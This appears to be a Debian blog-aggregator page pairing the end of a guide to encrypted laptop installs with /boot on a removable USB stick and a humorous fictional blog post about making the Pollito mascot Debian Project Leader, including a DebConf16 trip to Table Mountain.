Now you need to enter the passphrase that will be used to protect the private key of the crypt volume. Choose something long enough, like a sentence, and don't forget the passphrase, or you can no longer access your data! Don't save the passphrase on any computer, smartphone or password manager. If you want to make a backup of your passphrase, then use pen and paper and store the paper backup in a secure location.

The installer will show you a summary of the partitioning as shown above, but we need to make the change for the USB boot disk. At the moment it wants to put /boot on sda, which is the built-in disk, while our USB stick is sdb. Select /boot and hit enter, then select "Delete this partition".

After /boot has been deleted, we can create /boot on the USB stick, shown as sdb. Select sdb and hit enter. The installer will ask if you want to create an empty partition table; confirm that question with yes.

The partition summary now shows sdb with no partitions on it. Select FREE SPACE and choose "Create a new partition". Confirm the suggested partition size, and confirm the partition type "Primary".

It is time to tell the installer to use this new partition on the USB stick (sdb1) as the /boot partition. Select "Mount point: /home" and in the next dialog select "/boot - static files of the boot loader" as shown below:

Confirm the changes by selecting "Done setting up the partition".

The final partitioning should now look like the following screenshot:

If the partition summary looks good, go ahead with the installation by selecting "Finish partitioning and write changes to disk".

When the installer asks whether it should force EFI, select no, as EFI is not going to protect you.

Finish the installation as usual, select your preferred desktop environment etc.

GRUB Boot Loader

Confirm the dialog that asks to install GRUB to the master boot record. Here it is important to install it to the USB stick and not to your built-in SATA/SSD disk! So select sdb (the USB stick) in the next dialog.

First Boot from USB

Once everything is installed, you can boot from your USB stick. As a simple test, unplug the USB stick; the boot should then fail with "no operating system found" or a similar error message from the BIOS. If it doesn't boot even though the USB stick is connected, your BIOS is most likely not configured to boot from USB media. A blank screen with nothing happening usually also means the BIOS can't find a boot device. In that case you need to change the boot settings in your BIOS. As the steps differ greatly between BIOSes, I can't provide a detailed step-by-step list here.

Usually you can enter the BIOS using F1, F2 or F12 after powering on your computer. In the BIOS there is a menu to configure the boot order; in that list, USB disk/storage should be in the first position. After you have made the changes, save and exit the BIOS. Now it will boot from your USB stick first: GRUB will show up and proceed with the boot process until it asks for your passphrase to unlock the encrypted volume.

Unmount /boot partition after Boot

When you boot your laptop from the USB stick, you want to remove the stick once it has finished booting. This prevents an attacker from making modifications to your USB stick. To avoid data loss, we should not simply unplug the USB stick, but unmount /boot first and then unplug the stick. The good news is that we can automate this unmounting, so you just need to unplug the stick after the laptop has booted to your login screen.

Just add this line to your /etc/rc.local file:

umount /boot

After a boot you can verify once that it automatically unmounts /boot for you by running:

mount | grep /boot

If that command produces no output, then /boot is not mounted and you can safely unplug the USB stick.
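
Note that on a stock Debian system /etc/rc.local ends with an "exit 0" line, so the umount has to go before it. A minimal sketch of the resulting file:

```shell
#!/bin/sh -e
# /etc/rc.local - executed at the end of each multiuser runlevel.
# The umount line must come before the final "exit 0" that Debian ships.
umount /boot
exit 0
```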

Final Words

From time to time you will of course need to upgrade your Linux kernel, which lives on the /boot partition. This can still be done the regular way using apt-get upgrade, except that you need to mount /boot beforehand and unmount it again after the kernel upgrade.
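
The upgrade routine can be sketched as a small helper. This is my own illustration, not from the original post; /dev/sdb1 (the boot partition created during the install) is an assumption and may differ on your system.

```shell
# Sketch: upgrade the kernel with the USB boot partition mounted.
# Run as root with the stick plugged in; check your device with lsblk.
upgrade_kernel() {
    boot_dev="${1:-/dev/sdb1}"
    mount "$boot_dev" /boot || return 1   # plug the stick in first
    apt-get update
    apt-get upgrade                       # new kernel files land in /boot
    umount /boot                          # now the stick can be unplugged
}
```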

Enjoy your secured laptop. Now you can leave it in a hotel room without worrying that someone will try to obtain your passphrase by putting a keylogger in your boot partition. All an attacker will see is a fully encrypted hard disk. If they try to mess with your encrypted disk, you will notice, as the decryption will fail.

Disclaimer: other attack vectors are still possible, but they are much harder to pull off. Your hardware or BIOS can still be modified, but not by holding down the enter key for 70 seconds or by booting a live system.

06 December, 2016 01:28PM

December 05, 2016


Shirish Agarwal

The Anti-Pollito squad – arrest and confession

Disclaimer – This is an attempt at humor and hence entirely fictional in nature. While some incidents depicted are true, the context and the story woven around them are by yours truly. None of the mascots of Debian were hurt during this blog post 😉. I also disavow any responsibility for any hurt (real or imagined) to any past, current or future mascots. The attempt should not be seen as demeaning people who are accused of false crimes, tortured, and have confessions eked out of them, as this happens quite a lot (in India for sure, but I guess it's the same the world over, in varying degrees). The idea is loosely inspired by Chocolate: Deep Dark Secrets (2005).

On a more positive note, let’s start –

It being a Sunday morning, I woke up late to incessant knocking on the door; incidentally, mum was not at home. Opening the door, I found two official-looking gentlemen. They asked my name, asked for my credentials, tortured me and arrested me for "Group conspiracy of Malicious Mischief in the second and third degrees".

The torture was done by making me forcefully watch endless reruns of 'Norbit'. While I do love Eddie Murphy, this was one of his movies he could have done without 😦. I guess for many people watching it once was torture enough. I *think* it was nominated for Razzie awards; I don't know whether it won, but that is beside the point.

Unlike the 20 years it takes for a typical case to reach its conclusion in even the smallest court in India, thanks to the endless torture I was made to confess and was given summary judgement. The judgement was/is as follows –

a. Do 100 hours of Community service in Debian in 2017. This could be done via blog posts, raising tickets in the Debian BTS or in whichever way I could be helpful to Debian.

b. Write a confessional with some photographic evidence sharing/detailing some of the other members who were part of the conspiracy in view of the reduced sentence.

So now, have been forced to write this confession –

As you all know, I won a bursary this year for DebConf16. What is not known to most people is that I also got an innocuous-looking e-mail titled 'Pollito for DPL'. I can't name all the names, as the investigation into how far-reaching the conspiracy is remains ongoing. The email was purportedly written by members of a 'cabal within the cabal' within Debian. I looked at the email header to see if it was genuine and whether I could trace its origin, but was left none the wiser; obviously these people are far too technically advanced to fall for simple tricks like this –

Anyways, secretly happy to have been invited to be part of these elites, I did the visa thing, packed my bags and came to DebConf16.

At this juncture, I had no idea whether it was real or I had imagined the whole thing. Then, to my surprise, I saw this –

evidence of conspiracy to have Pollito as DPL, Wifi Password

Just like the Illuminati, the conspiracy was in plain sight for all those who knew about it. Most people thought of it as a joke, but those like me who had got the e-mails knew better. I knew the thing was real; now I only needed to bide my time, knowing the opportunity would present itself.

And a few days later, sure enough, there was a trip planned to 'Table Mountain, Cape Town'. A few people planned to hike up the mountain, while others chose to take the cable car to the top.

First glance of the cable car with table mountain as background

Quite a few people came along with us and bought tickets for the trip up the mountain and back.

Ticket for CPT Table mountain car cable

Incidentally, I was wondering whether the South African Govt. was getting its tax or not. If you look at the ticket, there is just a bar-code. In India as well as the U.S. there is a TIN – Tax Identification Number –

TIN displayed on an invoice from channeltimes.com

A few links to share what it is all about. While these should be on all invoices, you especially need to check when buying high-value items. In India, as shared in the article, the awareness and knowledge leave a bit to be desired. While I'm drifting from the incident, it would be nice if somebody from SA could share how things work there.

Moving on, we boarded the cable car. It was quite a spacious cable car; I guess around 30-40 people or more could see everything, along with the operator.

from inside the table mountain cable car 360 degrees

It was a pleasant cacophony of almost two dozen or more nationalities in this 360-degree rotating chamber. I was a little worried though, as it essentially is a bucket, and there is always the possibility that a severe wind could damage it. Later somebody did share that some frightful incidents had occurred on the cable car not too long ago.

It took about 20-25 odd minutes to get to the top of table mountain and we were presented with views such as below –

View from Table Mountain cable car looking down

The picture I am sharing was actually taken when we were going down, as all the pictures taken going up in the cable car were over-exposed. Also, it was much more crowded on the way up than on the way down, so handling the mobile camera was not so comfortable.

Once we reached the top, the wind was blowing at incredible speeds. Even with my jacket and everything, I was feeling cold. Most of the group, around 10-12 people, looked around for a place to have some refreshments and get some energy back. So we all ventured to a place and placed our orders –

the bleh... Irish coffee at top of Table Mountain

I was introduced to Irish coffee a few years back and have had some incredible Irish coffees in Pune and elsewhere. I do hope to be able to make Irish coffee at home if and when I have my own house. Done right, it is hotter than brandy and perfect if you are suffering from a cold; it really needs some skill. This is the only drink I wanted in SA which I never got right 😦. As South Africa was freezing for me, this would have been the perfect antidote, but the one there, as well as elsewhere, was all… bleh.

What was interesting, though, was the coffee caller beside it. It looked like a simple circuit mounted on a PCB with lights, a vibration motor and RFID, and it worked exactly like that. I am guessing that when the order is ready, a signal is sent via radio waves which causes the buzzer to light up and vibrate. Here's the back panel if somebody wants to take inspiration and try it as a fun project –

backpanel of the buzz caller

Once we were somewhat strengthened by the snacks, chai, coffee etc., we set out to see the mountain. The only way to describe it is that it's similar to Raigad Fort, but the plateau seems bigger. The Wikipedia page on Table Mountain attempts to describe it, but I guess it's more clearly conveyed by one of the pictures shared therein.

table mountain panoramic image

I have to say Table Mountain is beautiful and haunting, with scenes like these –

Some of the oldest rocks known to wo/man.

There is something there which pulls you, which reminds you of a long-lost past. I could simply have sat there for hours together, but as I was part of the group I had to keep up with them. Not that I minded.

The moment I was watching this, I was transported to memories of the Himalayas from about 20 odd years ago. In that previous life, I had the opportunity to be with some of the most beautiful women and also to be in the most happening of places, the Himalayas. Years before, I had shared some of my experiences in the Himalayas; I discontinued it as I didn't have a decent camera at that point in time. While I don't want to digress, I would challenge anybody to experience the Himalayas and then compare. It is just something inexplicable. The beauty and rawness that the Himalayas show make you feel insignificant and yet part of the whole cosmos. What Paulo Coelho expressed in The Valkyries is something that can be felt in the Himalayas. Leh, Ladakh, Himachal, Garhwal, Kumaon. The list could go on forever, as there are so many places, each more beautiful than the other. Most places are also extremely backpacker-friendly, so if you ask around you can get some awesome deals if you want to spend more than a few days in one place.

Moving on: @olasd, or Nicolas Dandrimont, the headmaster of our trip, made small talk with each of us and eked out of all of us that we wanted to have Pollito as our DPL (Debian Project Leader) for 2017. A few pictures are shared below as supporting evidence –

The Pollito as DPL cabal in action

members of the Pollito as DPL

where am I or more precisely how far am I from India.

I do not know who, further up than Nicolas, was in on the coup that would take place. The idea was this –

If the current DPL steps down, we would take all and any necessary actions to make Pollito our DPL.

Pollito going to SA - photo taken by Jonathan Carter This has been taken from Pollito’s adventure

Being a responsible journalist, I also enquired about Pollito's true history, as the story would not have been complete without it. This is the e-mail I got from Gunnar Wolf, a friend and DD from Mexico 🙂

Turns out, Valessio has just spent a week staying at my house🙂 And
in any case, if somebody in Debian knows about Pollito’s
childhood… That is me.

Pollito came to our lives when we went to Congreso Internacional de
Software Libre (CISOL) in Zacatecas city. I was strolling around the
very beautiful city with my wife Regina and our friend Alejandro
Miranda, and at a shop at either Ramón López Velarde or Vicente
Guerrero, we found a flock of pollitos.

http://www.openstreetmap.org/#map=17/22.77111/-102.57145

Even if this was comparable to a slave market, we bought one from
them, and adopted it as our own.

Back then, we were a young couple… Well, we were not that young
anymore. I mean, we didn’t have children. Anyway, we took Pollito with
us on several road trips, such as the only time I have crossed an
international border driving: We went to Encuentro Centroamericano de
Software Libre at Guatemala city in 2012 (again with Alejandro), and
you can see several Pollito pics at:

http://gwolf.org/album/road-trip-ecsl-2012-guatemala-0

Pollito likes travelling. Of course, when we were to Nicaragua for
DebConf, Pollito tagged along. It was his first flight as a passenger
(we never asked about his previous life in slavery; remember, Pollito
trust no one).

Pollito felt much welcome with the DebConf crowd. Of course, as
Pollito is a free spirit, we never even thought about forcing him to
come back with us. Pollito went to Switzerland, and we agreed to meet
again every year or two. It’s always nice to have a chat with him.

Hugs!

So with that backdrop I would urge fellow Debianities to take up the slogans –

LONG LIVE THE DPL !

LONG LIVE POLLITO !

LONG LIVE POLLITO THE DPL !

The first step to making Pollito the DPL is to ensure he has an @debian.org address ([email protected]).

We also need him to be made a DD because only then can he become a DPL.

In solidarity and in peace🙂


Filed under: Miscellaneous Tagged: #caller, #confession, #Debconf16, #debian, #Fiction, #history, #Pollito, #Pollito as DPL, #Table Mountain, Cabal, memories, south africa

05 December, 2016 05:01PM by shirishag75